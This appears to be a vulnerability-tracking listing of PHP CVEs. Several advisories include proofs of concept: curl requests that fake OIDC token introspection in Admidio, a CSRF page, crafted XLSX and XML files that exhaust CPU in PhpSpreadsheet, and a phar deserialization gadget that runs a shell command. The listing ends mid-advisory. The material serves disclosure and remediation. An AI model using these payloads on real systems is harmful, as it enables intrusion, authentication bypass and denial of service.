Skip to main content

PHP

24729 CVEs product

Monthly

CVE-2026-7501 LOW POC PATCH Monitor

Stored cross-site scripting (XSS) in LinkStack up to version 4.8.6 allows authenticated users to inject malicious scripts via the pageDescription parameter in the editPage function, which are then stored and executed in the browsers of users viewing the affected page. The vulnerability requires user interaction (victim must view the page) and authenticated access, limiting its scope to authenticated attackers, but publicly available exploit code exists and the vendor has provided a fix via pull request #974.

PHP XSS
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2022-50993 CRITICAL POC PATCH Act Now

Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

PHP RCE Microsoft File Upload
NVD
CVSS 4.0
9.3
EPSS
0.2%
CVE-2025-71284 CRITICAL POC Act Now

Remote code execution in Synway SMG Gateway Management Software allows unauthenticated attackers to execute arbitrary OS commands via command injection in the RADIUS configuration endpoint. The vulnerability exploits unsanitized POST parameters (radius_address, radius_address2, shared_secret2, source_ip, timeout, retry) that are directly interpolated into sed commands at /en/9-2radius.php. Shadowserver Foundation confirmed active exploitation beginning July 11, 2025, with publicly available exploit code and Nuclei templates enabling widespread automated attacks. CVSS 9.3 critical severity reflects the combination of network accessibility, zero authentication requirements, and complete system compromise potential.

Command Injection RCE PHP
NVD GitHub
CVSS 4.0
9.3
EPSS
0.5%
CVE-2026-6498 MEDIUM This Month

Five Star Restaurant Reservations plugin for WordPress versions up to 2.7.16 allows unauthenticated attackers to bypass payment verification through PHP type juggling in the valid_payment() function. The vulnerability exists in the rtb_stripe_pmt_succeed AJAX handler, which uses loose comparison (==) between attacker-supplied payment_id and the booking's stripe_payment_intent_id. When the intent ID is null (before Stripe intent creation), an empty payment_id parameter passes validation, enabling attackers to mark payment-pending bookings as paid without completing actual Stripe payments. This permits unauthorized order fulfillment and revenue loss for affected WordPress sites.

WordPress Authentication Bypass PHP
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-7447 LOW POC Monitor

SQL injection in SourceCodester Pet Grooming Management Software 1.0 allows authenticated remote attackers to manipulate the type, length, or business parameters in /admin/update_customer.php, enabling unauthorized database queries with limited confidentiality and integrity impact. The vulnerability requires login credentials (PR:L) but carries low overall severity (CVSS 2.1); however, publicly available exploit code exists and the attack vector is network-accessible, making it a practical risk for multi-tenant or shared hosting deployments.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-38940 MEDIUM This Month

Cross-site scripting (XSS) in RafyMrX TOKO-ONLINE-ROTI v.1.0 allows remote attackers to execute arbitrary JavaScript in a victim's browser via the detail_produk.php component when a user visits a malicious link. The vulnerability requires user interaction (clicking a link) and affects confidentiality and integrity with a CVSS score of 6.1. No active exploitation has been confirmed in CISA KEV, but a proof-of-concept payload exists in public repositories.

RCE PHP XSS N A
NVD GitHub
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-38939 MEDIUM This Month

Cross-site scripting (XSS) vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows remote attackers to execute arbitrary JavaScript in victim browsers and exfiltrate sensitive information through the product_catalogue.php component. The vulnerability requires user interaction (clicking a malicious link or visiting a compromised page) but affects all users due to stored or reflected XSS impact across site sessions. CVSS 6.1 reflects moderate risk with network-based attack vector and low complexity, though no active exploitation in CISA KEV has been confirmed at time of analysis.

RCE PHP XSS N A
NVD GitHub
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-41671 PHP MEDIUM PATCH GHSA This Month

## Summary The OIDC token introspection endpoint (`/modules/sso/index.php/oidc/introspect`) always returns `{"active": true}` for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (`/oidc/revoke`) returns `{"revoked": true}` without actually revoking any token, preventing resource servers from invalidating compromised credentials. ## Details The vulnerability is in `src/SSO/Service/OIDCService.php`, lines 604-619: ```php public function handleIntrospectionRequest() { // TODO_RK if (!$this->isServiceSetup) { $this->setupService(); } return new JsonResponse(["active" => true]); } public function handleRevocationRequest() { // TODO_RK if (!$this->isServiceSetup) { $this->setupService(); } return new JsonResponse(["revoked" => true]); } ``` The introspection endpoint is routed at `modules/sso/index.php`, line 58-59: ```php } elseif (strpos($requestUri, '/oidc/introspect') !== false) { $response = $oidcService->handleIntrospectionRequest(); ``` The router comment at line 35 says "Login checks will be done in the individual endpoint handler functions!" but neither `handleIntrospectionRequest` nor `handleRevocationRequest` perform any authentication or authorization checks. Per RFC 7662 (OAuth 2.0 Token Introspection), the introspection endpoint: 1. MUST authenticate the calling resource server (Section 2.1) 2. MUST validate the submitted token against its database 3. MUST return `{"active": false}` for invalid, expired, or revoked tokens The current implementation violates all three requirements. **Attack flow:** 1. Attacker obtains a resource server's endpoint URL that uses Admidio as its OIDC provider 2. Attacker crafts any arbitrary string as a Bearer token 3. Resource server sends the fabricated token to `/oidc/introspect` for validation 4. Admidio returns `{"active": true}` without any checks 5. Resource server accepts the fabricated token as valid and grants access **The revocation bypass compounds this:** If a legitimate token is stolen, the resource server or client application cannot revoke it. Calling `/oidc/revoke` returns success without actually revoking the token in the database, so the stolen token remains usable indefinitely (until its expiry time). ## PoC ```bash # Step 1: Confirm the introspection endpoint exists and always returns active # No valid token needed - any string works curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=COMPLETELY_FABRICATED_TOKEN_12345" # Expected response: {"active":true} # Step 2: Try with an empty token curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=" # Expected response: {"active":true} # Step 3: Demonstrate that revocation is also broken curl -X POST https://TARGET/modules/sso/index.php/oidc/revoke \ -d "token=any_valid_token_here" # Expected response: {"revoked":true} # But the token is NOT actually revoked in the database # Step 4: Verify the token is still active after "revocation" curl -X POST https://TARGET/modules/sso/index.php/oidc/introspect \ -d "token=any_valid_token_here" # Still returns: {"active":true} ``` ## Impact - **Authentication Bypass on Resource Servers**: Any application (wiki, CMS, project management tool, etc.) configured to validate tokens against this Admidio OIDC introspection endpoint will accept completely fabricated tokens. An attacker can impersonate any user on all connected resource servers. - **Inability to Revoke Compromised Tokens**: If a legitimate access token is leaked or stolen, there is no way to revoke it through the standard OIDC revocation flow. The token remains valid until its 1-hour expiry. - **Scope Change (S:C)**: The vulnerability in the Admidio authorization server directly impacts the security of all connected resource servers (different security authority), which is why the CVSS scope is Changed. ## Recommended Fix Replace the stub implementations with proper token introspection and revocation logic: ```php public function handleIntrospectionRequest() { if (!$this->isServiceSetup) { $this->setupService(); } $request = $this->getRequest(); // 1. Authenticate the resource server (RFC 7662 Section 2.1) // The resource server MUST authenticate using client credentials $clientId = $request->getParsedBody()['client_id'] ?? null; $clientSecret = $request->getParsedBody()['client_secret'] ?? null; if (!$clientId || !$this->clientRepository->validateClient($clientId, $clientSecret, null)) { return new JsonResponse(['error' => 'invalid_client'], 401); } // 2. Get and validate the token $tokenValue = $request->getParsedBody()['token'] ?? ''; if (empty($tokenValue)) { return new JsonResponse(['active' => false]); } try { // Validate the token using the resource server $validatedRequest = $this->resourceServer->validateAuthenticatedRequest( $request->withHeader('Authorization', 'Bearer ' . $tokenValue) ); $tokenId = $validatedRequest->getAttribute('oauth_access_token_id'); // Check if token is revoked if ($this->accessTokenRepository->isAccessTokenRevoked($tokenId)) { return new JsonResponse(['active' => false]); } $token = $this->accessTokenRepository->getToken($tokenId); // Check expiry if ($token->getExpiryDateTime() < new \DateTimeImmutable()) { return new JsonResponse(['active' => false]); } return new JsonResponse([ 'active' => true, 'sub' => $token->getUserIdentifier(), 'client_id' => $token->getClient()->getIdentifier(), 'exp' => $token->getExpiryDateTime()->getTimestamp(), 'scope' => implode(' ', array_map(fn($s) => $s->getIdentifier(), $token->getScopes())), ]); } catch (\Exception $e) { return new JsonResponse(['active' => false]); } } public function handleRevocationRequest() { if (!$this->isServiceSetup) { $this->setupService(); } $request = $this->getRequest(); // Authenticate the client $clientId = $request->getParsedBody()['client_id'] ?? null; $clientSecret = $request->getParsedBody()['client_secret'] ?? null; if (!$clientId || !$this->clientRepository->validateClient($clientId, $clientSecret, null)) { return new JsonResponse(['error' => 'invalid_client'], 401); } $tokenValue = $request->getParsedBody()['token'] ?? ''; if (!empty($tokenValue)) { try { $validatedRequest = $this->resourceServer->validateAuthenticatedRequest( $request->withHeader('Authorization', 'Bearer ' . $tokenValue) ); $tokenId = $validatedRequest->getAttribute('oauth_access_token_id'); $this->accessTokenRepository->revokeAccessToken($tokenId); } catch (\Exception $e) { // RFC 7009: The server responds with HTTP 200 even for invalid tokens } } return new JsonResponse([], 200); } ```

Authentication Bypass PHP
NVD GitHub
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-41670 PHP HIGH PATCH GHSA This Week

SAML response redirection in Admidio 5.0.8 and earlier allows attackers to steal signed authentication assertions containing user credentials and profile data by exploiting missing validation of the AssertionConsumerServiceURL in SAML AuthnRequests. The Identity Provider (IdP) accepts attacker-controlled destination URLs from SAML requests without verifying them against registered Service Provider endpoints, enabling assertion theft and account impersonation across federated applications. No public exploit code identified at time of analysis, though proof-of-concept demonstration is included in the GitHub security advisory GHSA-p9w9-87c8-m235. EPSS data not available for this CVE.

PHP Information Disclosure
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-41669 PHP HIGH PATCH GHSA This Week

SAML signature validation in Admidio's Identity Provider implementation can be completely bypassed due to discarded return values in authentication flows. The validateSignature() method returns error strings on failure but both call sites (SSO and Single Logout handlers) discard the return value, allowing unsigned or invalidly-signed SAML requests to proceed. Attackers can forge AuthnRequests to exfiltrate logged-in users' personal data (username, email, real name, role memberships) to attacker-controlled endpoints, or forge LogoutRequests to terminate victim sessions and cascade logout across federated Service Providers. The smc_require_auth_signed configuration setting provides no protection. Public exploit code exists (PoC in GitHub advisory). CVSS 8.2 reflects network-accessible attack with no authentication required, though practical exploitation of the SSO path requires victim to have an active session. No active exploitation confirmed at time of analysis.

PHP CSRF Jwt Attack Denial Of Service
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-41663 PHP LOW PATCH GHSA Monitor

## Summary Several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because `SameSite=Lax` cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. ## Details In `modules/preferences.php`, the `backup`, `test_email`, and `htaccess` modes accept GET parameters with no CSRF token check: ```php // modules/preferences.php - backup mode case 'backup': // Creates full database dump and serves as download // No CSRF token validation $backupFile = $gDb->backup(); // ... sends file to client break; case 'test_email': // Sends test email from the server // No CSRF token validation break; case 'htaccess': // Writes .htaccess file to disk // No CSRF token validation break; ``` The `save` mode in the same file validates CSRF via `getFormObject()`, confirming the developers intended CSRF protection but did not apply it to these other modes. Because these are GET requests, `SameSite=Lax` browsers include session cookies on top-level cross-origin navigations, making CSRF exploitation trivial. ## Proof of Concept Simplified attacker page (`csrf.html` hosted on attacker origin): ```html <html> <body> <h1>Loading...</h1> <!-- Trigger backup creation on victim's browser --> <script>window.location = 'https://target-admidio.example.com/adm_program/modules/preferences.php?mode=backup';</script> </body> </html> ``` When an administrator visits this page, the browser navigates to the Admidio backup URL with full session cookies. The server generates a database dump and serves it as a download to the victim's browser. Note: the backup downloads to the victim's machine, not to the attacker. The attacker cannot read the response cross-origin. For `htaccess` mode, the CSRF overwrites the `.htaccess` file on the server, disrupting the application. For `test_email` mode, it triggers email sends from the server, which an attacker can abuse for spam or to probe internal email infrastructure. ## Impact An attacker tricks an Admidio administrator into visiting a malicious page that triggers state-changing operations on the server: - **Backup creation**: forces the server to generate a full database dump. The backup downloads to the victim's browser, not to the attacker. However, repeated backup triggers can cause disk I/O and storage pressure on the server. - **htaccess modification**: overwrites the server's `.htaccess` file, breaking URL routing or disabling security headers. - **Test email**: fires email sends from the server, usable as a spam relay or to probe internal mail configuration. The core issue is that state-changing operations run via unprotected GET requests. The victim only needs to visit a single attacker-controlled page while logged in. ## Recommended Fix 1. Change `backup`, `test_email`, and `htaccess` operations to require POST requests. 2. Add CSRF token validation using the existing `getFormObject()` mechanism. 3. As defense in depth, set `SameSite=Strict` on session cookies or add a confirmation step for destructive operations like database backup. --- *Found by [aisafe.io](https://aisafe.io)*

PHP CSRF
NVD GitHub
CVSS 3.1
3.5
EPSS
0.0%
CVE-2026-41662 PHP MEDIUM PATCH GHSA This Month

Admidio 5.0.8 and earlier allows authenticated administrators to remove all other administrators from the system via Role::stopMembership(), which lacks a minimum-administrator-count validation check. Two colluding or compromised admin accounts can sequentially remove each other, leaving zero administrators and locking administrative access. The vulnerability requires high privileges (PR:H) and user interaction (UI:R) but results in complete denial of administrative access once exploited.

PHP Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.2
EPSS
0.0%
CVE-2026-41661 PHP MEDIUM PATCH GHSA This Month

Reflected cross-site scripting (XSS) in Admidio's msg_window.php endpoint allows unauthenticated attackers to execute arbitrary JavaScript in any user's browser by exploiting incomplete output encoding. The vulnerability chains htmlspecialchars() (which does not encode square brackets) with a subsequent Language::prepareTextPlaceholders() call that converts brackets to angle brackets, producing executable HTML markup. Publicly available proof-of-concept demonstrates the attack requires only victim click (no authentication), and Admidio sets no Content-Security-Policy headers to block inline script execution.

PHP XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-41660 PHP HIGH PATCH GHSA This Week

Inverted authorization logic in Admidio's two-factor authentication reset module allows non-admin users with profile edit permissions to strip TOTP protection from administrator accounts while paradoxically blocking users from resetting their own 2FA. A group leader holding 'hasRightEditProfile()' rights on an admin account can send a single POST request to /adm_program/modules/profile/two_factor_authentication.php with the admin's UUID, disabling the admin's 2FA and reducing account security to password-only. This vulnerability affects Admidio versions ≤5.0.8; patched version 5.0.9 corrects the inverted comparison operator. Public exploit code exists via the GitHub advisory's proof-of-concept. No confirmed active exploitation (not in CISA KEV).

Authentication Bypass PHP
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-41659 PHP LOW PATCH GHSA Monitor

Admidio members_assignment_data.php endpoint leaks hidden profile field values through a blind search oracle attack. Role leaders with ROLE_LEADER_MEMBERS_ASSIGN permissions can infer exact values of hidden PII fields (birthdays, street addresses, cities, postal codes, countries) by observing which users appear in search results, despite these fields being suppressed from JSON output. The vulnerability affects Admidio versions up to 5.0.8 and is fixed in 5.0.9.

PHP Oracle Information Disclosure
NVD GitHub
CVSS 3.1
2.7
EPSS
0.0%
CVE-2026-41658 PHP MEDIUM PATCH GHSA This Month

Admidio inventory module allows any authenticated user to permanently delete inventory items and modify associated data by bypassing authorization checks present only in the UI layer. The backend handlers for item_delete, item_retire, item_reinstate, and picture operations validate CSRF tokens but never verify the requesting user is an inventory administrator, enabling destructive operations on any item visible to the user. This affects Admidio versions through 5.0.8, and no active exploitation has been reported at the time of analysis.

Authentication Bypass PHP CSRF
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-41657 PHP MEDIUM PATCH GHSA This Month

Admidio 5.0.8 and earlier allows user managers with rol_edit_user permission to bypass multi-tenant organization isolation and retrieve complete member directories across all organizations by directly calling the contacts_data.php endpoint with mem_show_filter=3, exploiting a permission check mismatch between the frontend UI (which correctly requires isAdministrator() and contacts_show_all setting) and the backend API endpoint (which only requires the weaker isAdministratorUsers() check). Affected data includes full names, email addresses, login names, UUIDs, and all configured profile fields from unauthorized organizations. This is confirmed actively exploited vulnerability with patch available in version 5.0.9.

Authentication Bypass PHP
NVD GitHub
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-41656 PHP MEDIUM PATCH GHSA This Month

Path traversal in Admidio's document add mode allows authenticated attackers to register arbitrary server files into document folders via unvalidated `name` parameter, enabling arbitrary file read when combined with CSRF. A low-privileged user can trick a documents administrator into clicking a malicious link to register sensitive files like `install/config.php` (containing database credentials) into a publicly accessible documents folder, then download those files using the attacker's own session. The vulnerability chains insufficient input validation (accepts `../` sequences), missing CSRF protection on the `add` action, and `SameSite=Lax` cookies that permit cross-site GET requests from administrators.

PHP CSRF Path Traversal
NVD GitHub
CVSS 3.1
4.5
EPSS
0.0%
CVE-2026-41655 PHP MEDIUM PATCH GHSA This Month

Path traversal in Admidio ecard_preview.php allows authenticated users to read arbitrary server files including database credentials by bypassing filename validation on the ecard_template POST parameter. An authenticated attacker can supply path traversal payloads such as ../config.php to read adm_my_files/config.php containing unencrypted database host, username, and password, or traverse further to access system files. Exploitation requires only a regular member account with no special privileges, making this a high-impact vulnerability accessible to any registered user.

PHP Path Traversal
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-7410 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the pid parameter in /admin/ajax.php?action=add_to_cart, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has publicly available exploit code and may be actively exploited.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7409 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers with high privileges to manipulate the save_user function in /admin/ajax.php via crafted input, enabling data exfiltration and modification. The vulnerability requires administrative credentials, has publicly available exploit code, and poses moderate risk (CVSS 4.7) primarily to systems where admin accounts are compromised or weak.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-42206 PHP MEDIUM PATCH GHSA This Month

Roadiz OpenID Connect authentication fails to store and validate the nonce parameter, allowing attackers to replay valid ID tokens or inject tokens from compromised identity providers to impersonate users. The package generates a nonce during authorization request initiation but never validates the returned nonce claim in the ID token, violating OIDC Core 1.0 specification requirements. Publicly available proof-of-concept demonstrates token replay within the token's validity window, affecting all Roadiz applications using the roadiz/openid package versions before 2.7.18, 2.6.31, 2.5.45, or 2.3.43.

PHP CSRF
NVD GitHub
CVSS 4.0
5.7
EPSS
0.0%
CVE-2026-7408 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege attackers to manipulate the save_menu function via the /admin/ajax.php endpoint, enabling database queries with limited confidentiality and integrity impact. The vulnerability requires administrative credentials and carries a moderate CVSS score of 4.7; publicly available exploit code exists but active exploitation at scale has not been confirmed.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-41587 PHP HIGH PATCH GHSA This Week

Authenticated users with theme upload permission in CI4MS (CodeIgniter 4 CMS/ERP) versions 0.26.0.0 through 0.31.6.0 can achieve remote code execution by uploading a malicious ZIP archive containing PHP files. The theme installation routine writes arbitrary files-including executable PHP-directly into the web-accessible public/templates/ directory without extension filtering or content validation, enabling direct HTTP access to webshells. A proof-of-concept exploit is publicly available via the GitHub security advisory (GHSA-fw49-9xq4-gmx6), and the vendor has released a patched version 0.31.7.0 implementing strict file extension allowlists for the public directory.

PHP RCE File Upload
NVD GitHub
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-7407 LOW POC Monitor

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege users to manipulate the save_settings function via the /pizzafy/admin/ajax.php endpoint, enabling database query modification with confidentiality, integrity, and availability impact. The vulnerability requires high-level authentication and is not remotely exploitable by unauthenticated attackers despite network-accessible endpoint; publicly available exploit code exists and the vulnerability has been disclosed.

PHP SQLi
NVD VulDB GitHub
CVSS 4.0
2.0
EPSS
0.0%
CVE-2026-40902 PHP HIGH PATCH GHSA This Week

## Summary The XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r="999999999"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources. ## Details In `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking: ```php // ColumnAndRowAttributes.php:216 $rowIndex = (int) $row['r']; // No validation against AddressRange::MAX_ROW ``` This value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`: ```php // Worksheet.php:1342-1349 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` The inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86): ```php // RowIterator.php:86 $this->endRow = $endRow ?: $this->subject->getHighestRow(); ``` Notably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks. ## PoC **Step 1: Create the malicious XLSX file (~1.6KB)** ```python import zipfile import io content_types = '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>' rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>' workbook = '<?xml version="1.0" encoding="UTF-8"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>' wb_rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>' sheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData><row r="1"><c r="A1"><v>1</v></c></row><row r="999999999" ht="15"/></sheetData></worksheet>' with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr('[Content_Types].xml', content_types) zf.writestr('_rels/.rels', rels) zf.writestr('xl/workbook.xml', workbook) zf.writestr('xl/_rels/workbook.xml.rels', wb_rels) zf.writestr('xl/worksheets/sheet1.xml', sheet) print("Created dos_row.xlsx") ``` **Step 2: Load with PhpSpreadsheet (CPU exhaustion)** ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load('dos_row.xlsx'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Output: Highest row: 999999999 // This will consume CPU for ~144 seconds (999M iterations) foreach ($sheet->getRowIterator() as $row) { // CPU exhaustion } ``` **Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely. ## Impact - **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file. - **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory. - **Amplification:** The ratio of input size to resource consumption is extreme - 1,580 bytes triggers nearly 1 billion iterations. - **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely. ## Recommended Fix Add row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161: ```php // src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216 // Before: $rowIndex = (int) $row['r']; // After: $rowIndex = (int) $row['r']; if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) { continue; } ``` The `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.

PHP Python Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-40863 PHP HIGH PATCH GHSA This Week

## Summary The SpreadsheetML XML reader (`Reader\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index="999999999"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. ## Details In `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements: ```php // Xml.php:397-402 if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW } if (isset($row_ss['Hidden'])) { $rowVisible = ((string) $row_ss['Hidden']) !== '1'; $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible); } ``` The `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`: ```php // Worksheet.php:1342-1351 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` This inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`. The `RowIterator` constructor uses `getHighestRow()` as its default end row: ```php // RowIterator.php:84-88 public function resetEnd(?int $endRow = null): static { $this->endRow = $endRow ?: $this->subject->getHighestRow(); return $this; } ``` With `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection - it returns `true` for all cells. Even without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability. ## PoC 1. Create `poc.xml`: ```xml <?xml version="1.0"?> <?mso-application progid="Excel.Sheet"?> <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"> <Worksheet ss:Name="Sheet1"> <Table> <Row ss:Index="999999999" ss:Hidden="1"/> <Row><Cell><Data ss:Type="String">test</Data></Cell></Row> </Table> </Worksheet> </Workbook> ``` 2. Load and iterate: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xml'); $spreadsheet = $reader->load('poc.xml'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Outputs: Highest row: 1000000000 // This loop will attempt ~1 billion iterations → CPU exhaustion foreach ($sheet->getRowIterator() as $row) { // Never completes } ``` ## Impact Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by: - Exhausting server CPU with a single small XML file (~300 bytes) - Blocking the PHP worker process, potentially affecting all concurrent users - Triggering PHP max_execution_time limits that still consume resources before killing the process The attack requires no authentication - only the ability to upload or cause the application to process a crafted SpreadsheetML file. ## Recommended Fix Add MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`: ```php // After line 398: if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; if ($rowID > AddressRange::MAX_ROW) { $rowID = AddressRange::MAX_ROW; } } ``` Add the necessary import at the top of the file: ```php use PhpOffice\PhpSpreadsheet\Cell\AddressRange; ``` The same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.

PHP Microsoft Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-34084 PHP CRITICAL PATCH GHSA Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php 